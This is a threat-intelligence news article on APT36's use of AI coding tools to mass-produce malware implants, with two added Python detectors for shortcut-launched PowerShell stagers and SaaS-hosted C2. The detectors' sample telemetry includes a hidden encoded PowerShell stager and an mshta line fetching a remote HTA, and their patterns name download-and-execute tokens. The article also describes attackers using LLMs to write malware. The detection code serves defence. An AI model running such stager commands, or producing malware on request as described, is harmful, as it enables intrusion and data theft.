
Transparent Tribe Uses AI to Generate Malware Implants in Targeting Campaign in India

Ravie Lakshmanan, Mar 06, 2026. Threat Intelligence / Cyber Espionage

The Pakistan-linked threat actor known as Transparent Tribe, also tracked as APT36, has become the latest hacking group to adopt artificial intelligence (AI)-powered coding tools to hit targets with a variety of malware implants.

The activity is designed to produce high volumes of medium-sophistication implants written in less common programming languages such as Nim, Zig, and Crystal, which rely on trusted services such as Slack, Discord, Supabase, and Google Sheets to fly under the radar, according to new findings from Bitdefender.

“Instead of technological development, we are seeing a shift towards an AI-assisted malware industry that allows the actor to flood their target areas with disposable, polyglot binaries,” security researchers Radu Tudorica, Adrian Schipor, Victor Vrabie, Marius Baciu, and Martin Zugec said in a technical breakdown of the campaign.

The Romanian cybersecurity vendor characterizes this shift toward what it calls “vibeware” as a way of frustrating detection, describing the approach as distributed denial of discovery (DDoD). The idea is not to evade detection through sophisticated techniques, but to flood the target environment with disposable binaries, each written in a different language and using a different communication protocol.

Large language models (LLMs) help the threat actors here by lowering the barrier to entry and closing the skills gap: they enable the actor to generate functional code in non-mainstream languages, either from scratch or by porting core functionality from mainstream ones.

The latest set of attacks targets the Indian government and its embassies in several foreign countries, with APT36 using LinkedIn to identify high-value targets. The Afghan government and several private businesses were also targeted, albeit to a lesser extent.

Infection chains start with phishing emails carrying Windows shortcut (LNK) files bundled inside ZIP archives or ISO images. Alternatively, decoy PDFs with a prominent “Download Document” button redirect users to an attacker-controlled website that serves similar ZIP archives.

In either case, the LNK file executes PowerShell in memory, which then downloads and runs the backdoor and enables post-compromise activity. This includes the deployment of popular adversary simulation frameworks such as Cobalt Strike and Havoc, reflecting a hybrid approach in which commodity tooling sits alongside the custom implants for resilience.
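The chain described above (shortcut inside a ZIP or ISO, opened from Explorer, spawning a PowerShell stager that runs in memory) leaves a recognisable footprint in process-creation telemetry. The following is an added detection example for this article, not code from Bitdefender or from the campaign. It assumes Sysmon Event ID 1 records flattened to the fields parent image, image, command line and current directory; the field names, scoring threshold and the four sample events are constructed for illustration, and the drive-letter check for mounted ISOs is a heuristic that will also hit ordinary data drives.

```python
"""Flag shortcut-launched in-memory PowerShell stagers in process-creation telemetry.

Added example for this article; not code from Bitdefender or the campaign.
Assumes Sysmon Event ID 1 (process creation) records flattened to the fields
below. The sample events are constructed, not real telemetry.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import List


@dataclass
class ProcEvent:
    record_id: int
    parent_image: str
    image: str
    command_line: str
    current_directory: str = ""


# A shortcut opened from a ZIP or a mounted ISO is launched by Explorer, so the
# script host's parent is explorer.exe rather than a terminal, task or service.
SHORTCUT_LAUNCHERS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}

# Command-line traits of a download-and-execute stager. Each is weak alone
# (admins use -NoProfile too); the verdict depends on how many accumulate.
STAGER_TRAITS = {
    "encoded_command": re.compile(r"(^|\s)-e(nc(odedcommand)?|c)?\b", re.I),
    "hidden_window":   re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "no_profile":      re.compile(r"-nop(rofile)?\b", re.I),
    "bypass_policy":   re.compile(r"-(ep|executionpolicy)\s+bypass", re.I),
    "in_memory_exec":  re.compile(r"\biex\b|invoke-expression", re.I),
    "remote_fetch":    re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b"
        r"|\bwget\b|net\.webclient|https?://", re.I),
}

# Where Explorer unpacks a double-clicked ZIP (%TEMP%\Temp1_<name>.zip\) and,
# as a weaker heuristic, the root of a non-system drive, which is where a freshly
# mounted ISO appears. A user's data drive root also matches, so this only adds
# to the score rather than deciding it.
ARCHIVE_DIR = re.compile(r"\\Temp\\Temp\d+_[^\\]*(\\|$)|^[D-Z]:\\?$", re.I)


def _basename(path: str) -> str:
    return ntpath.basename(path.strip('"')).lower()


def score_event(ev: ProcEvent) -> List[str]:
    """Return the matched indicators; empty when the parent/child precondition fails."""
    if not (_basename(ev.parent_image) in SHORTCUT_LAUNCHERS
            and _basename(ev.image) in SCRIPT_HOSTS):
        return []
    reasons = ["script_host_spawned_by_explorer"]
    reasons += [name for name, rx in STAGER_TRAITS.items()
                if rx.search(ev.command_line)]
    if ARCHIVE_DIR.search(ev.current_directory):
        reasons.append("launched_from_archive_or_mounted_image")
    return reasons


def is_suspicious(ev: ProcEvent, threshold: int = 3) -> bool:
    return len(score_event(ev)) >= threshold


def suspicious_record_ids(events, threshold: int = 3) -> List[int]:
    return [ev.record_id for ev in events if is_suspicious(ev, threshold)]


# Constructed sample telemetry (hypothetical paths, users and payload).
SAMPLE_EVENTS = [
    # 1: stager launched from a LNK inside a ZIP that Explorer unpacked to %TEMP%
    ProcEvent(1, "C:\\Windows\\explorer.exe",
              "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              "powershell.exe -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
              "C:\\Users\\alice\\AppData\\Local\\Temp\\Temp1_Invitation.zip\\"),
    # 2: user opened PowerShell from the Start menu (benign)
    ProcEvent(2, "C:\\Windows\\explorer.exe",
              "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"",
              "C:\\Users\\alice\\"),
    # 3: scheduled task running an admin script (benign, parent is not Explorer)
    ProcEvent(3, "C:\\Windows\\System32\\svchost.exe",
              "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1",
              "C:\\Windows\\System32\\"),
    # 4: mshta fetching a remote HTA from a shortcut on a mounted ISO (E:)
    ProcEvent(4, "C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\mshta.exe",
              "mshta.exe http://198.51.100.7/doc.hta", "E:\\"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev.record_id, is_suspicious(ev), score_event(ev))
```

The precondition (Explorer as the parent of a script host) is what ties the rule to the shortcut delivery described above; the remaining traits are shared with many other stagers, so the same scoring generalises beyond this campaign, which is why a threshold rather than any single token decides the verdict.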

Some of the tools observed in the attacks are listed below –

  • Warcode, a custom shellcode loader written in Crystal that loads the Havoc agent directly into memory.
  • NimShellcodeLoader, a Nim-based counterpart to Warcode that runs an embedded Cobalt Strike Beacon.
  • CreepDropper, a .NET dropper used to deliver and install additional payloads, including SHEETCREEP, a Go-based infostealer that uses the Microsoft Graph API for C2, and MAILCREEP, a C#-based backdoor that uses Google Sheets for C2. Both malware families were described by Zscaler ThreatLabz in January 2026.
  • SupaServ, a Rust-based backdoor that uses the Supabase platform as its primary communication channel, with Firebase as a backup. Its code contains Unicode emojis, suggesting it may have been developed with AI.
  • LuminousStealer, a possibly vibe-coded Rust-based infostealer that uses Firebase and Google Drive to exfiltrate files with certain extensions (.txt, .docx, .pdf, .png, .jpg, .xlsx, .pptx, .zip, .rar, .doc, and .xls).
  • CrystalShell, a backdoor written in Crystal that can target Windows, Linux, and macOS systems and uses hard-coded Discord channel IDs for C2. It supports running commands and collecting host information. One variant was found using Slack for C2.
  • ZigShell, a CrystalShell counterpart written in Zig that uses Slack as its core C2 infrastructure. It additionally supports file upload and download.
  • CrystalFile, a simple command runner written in Crystal that continuously monitors “C:\Users\Public\AccountPictures\input.txt” and executes its contents using “cmd.exe.”
  • Bright Cookies, a Rust-based injector for extracting cookies, passwords, and payment information from Chromium-based browsers by bypassing application-bound encryption.
  • BackupSpy, a Rust-based utility designed to monitor local file systems and external media for high-value data.
  • ZigLoader, a loader written in Zig that decrypts and executes arbitrary shellcode in memory.
  • GateSentinel Beacon, a customized version of the open-source GateSentinel C2 framework.
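Almost every implant in the list above (SupaServ on Supabase and Firebase, CrystalShell on Discord or Slack, ZigShell on Slack, LuminousStealer on Firebase and Google Drive, MAILCREEP on Google Sheets) hides its C2 inside traffic to services the network already trusts, and CrystalFile runs out of C:\Users\Public\AccountPictures. The signature-agnostic counter to that is to ask which process is talking to the service and where that process lives. The following is an added example for this article, not Bitdefender's or the actor's code. It assumes each network event has already been joined to the originating process image and the destination hostname (for instance from Sysmon Event ID 22 DNS queries or proxy logs); the hostname suffixes, the per-service process allowlists, the suspicious-path patterns and the sample events are constructed starting points that need tuning in a real environment.

```python
"""Spot implants hiding C2 in trusted SaaS by correlating process and destination.

Added example for this article; not Bitdefender's or the actor's code. Assumes
each event already carries the process image and destination hostname (e.g.
joined from Sysmon Event ID 22 or proxy logs). Hostnames, allowlists and
sample events are constructed and need per-environment tuning.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}

# Services the article's implants abuse for C2 or exfiltration, each mapped to
# the hostname suffixes it uses and the processes expected to talk to it. The
# traffic is only "legitimate" if the client is; anything else is worth a look.
SERVICES = {
    "slack":    (("slack.com",), BROWSERS | {"slack.exe"}),
    "discord":  (("discord.com", "discordapp.com", "discord.gg"),
                 BROWSERS | {"discord.exe"}),
    "google":   (("sheets.googleapis.com", "www.googleapis.com",
                  "oauth2.googleapis.com"), BROWSERS | {"googledrivefs.exe"}),
    "supabase": (("supabase.co",), BROWSERS),
    "firebase": (("firebaseio.com", "firestore.googleapis.com",
                  "firebasestorage.googleapis.com"), BROWSERS),
    "msgraph":  (("graph.microsoft.com",),
                 BROWSERS | {"outlook.exe", "ms-teams.exe", "onedrive.exe"}),
}

# User-writable drop locations; C:\Users\Public\AccountPictures is the one the
# article attributes to CrystalFile, the others are common dropper staging dirs.
SUSPICIOUS_PATHS = re.compile(
    r"\\Users\\Public\\|\\AppData\\Local\\Temp\\|\\Downloads\\", re.I)


@dataclass
class NetEvent:
    record_id: int
    image: str
    dest_host: str
    dest_port: int = 443


def classify_host(host: str) -> Optional[str]:
    """Map a destination hostname to one of the tracked services, or None."""
    host = host.lower().rstrip(".")
    for service, (suffixes, _) in SERVICES.items():
        for suffix in suffixes:
            if host == suffix or host.endswith("." + suffix):
                return service
    return None


def triage(ev: NetEvent) -> Tuple[Optional[str], List[str]]:
    """Return (service, reasons). An empty reasons list means nothing to alert on.

    An expected client binary running from a user-writable path still produces a
    reason, which catches implants masquerading as the legitimate client.
    """
    service = classify_host(ev.dest_host)
    if service is None:
        return None, []
    reasons: List[str] = []
    image = ntpath.basename(ev.image).lower()
    if image not in SERVICES[service][1]:
        reasons.append(f"unexpected_client:{image}->{service}")
    if SUSPICIOUS_PATHS.search(ev.image):
        reasons.append("binary_in_user_writable_path")
    return service, reasons


def alerting_record_ids(events) -> List[int]:
    return [ev.record_id for ev in events if triage(ev)[1]]


# Constructed sample telemetry (hypothetical hosts, paths and binaries).
SAMPLE_EVENTS = [
    NetEvent(1, "C:\\Users\\alice\\AppData\\Local\\slack\\slack.exe", "wss-primary.slack.com"),
    NetEvent(2, "C:\\Users\\Public\\AccountPictures\\update.exe", "api.slack.com"),        # ZigShell-like
    NetEvent(3, "C:\\Users\\bob\\AppData\\Local\\Temp\\sync.exe", "abcd1234.supabase.co"),  # SupaServ-like
    NetEvent(4, "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "discord.com"),
    NetEvent(5, "C:\\Windows\\System32\\svchost.exe", "update.microsoft.com"),              # untracked service
    NetEvent(6, "C:\\Users\\bob\\Documents\\report.exe", "gateway.discord.gg"),             # CrystalShell-like
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev.record_id, ev.dest_host, triage(ev))
```

The allowlist is deliberately per service rather than global: a browser reaching Supabase is unremarkable, while a binary in a Temp directory doing the same thing is exactly the disposable implant the article describes, regardless of what language it was written in or how unique its hash is.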

“APT36’s shift to vibeware represents a step down in technology,” Bitdefender said. “Although AI-assisted development increases sample volume, the resulting tools are often unstable and full of logical errors. The actor’s strategy is directed at signature-based detection, which has long been replaced by endpoint security.”

Bitdefender warned that the real threat posed by AI-assisted malware is the industrialization of attacks, allowing threat actors to scale up their operations quickly and with little effort.

“We see the convergence of two trends that have been developing for a long time: the adoption of exotic, niche programming languages, and the abuse of trusted services to hide within legitimate network traffic,” the researchers said. “This combination allows mediocre code to achieve high operational success by simply bypassing standard defensive telemetry.”
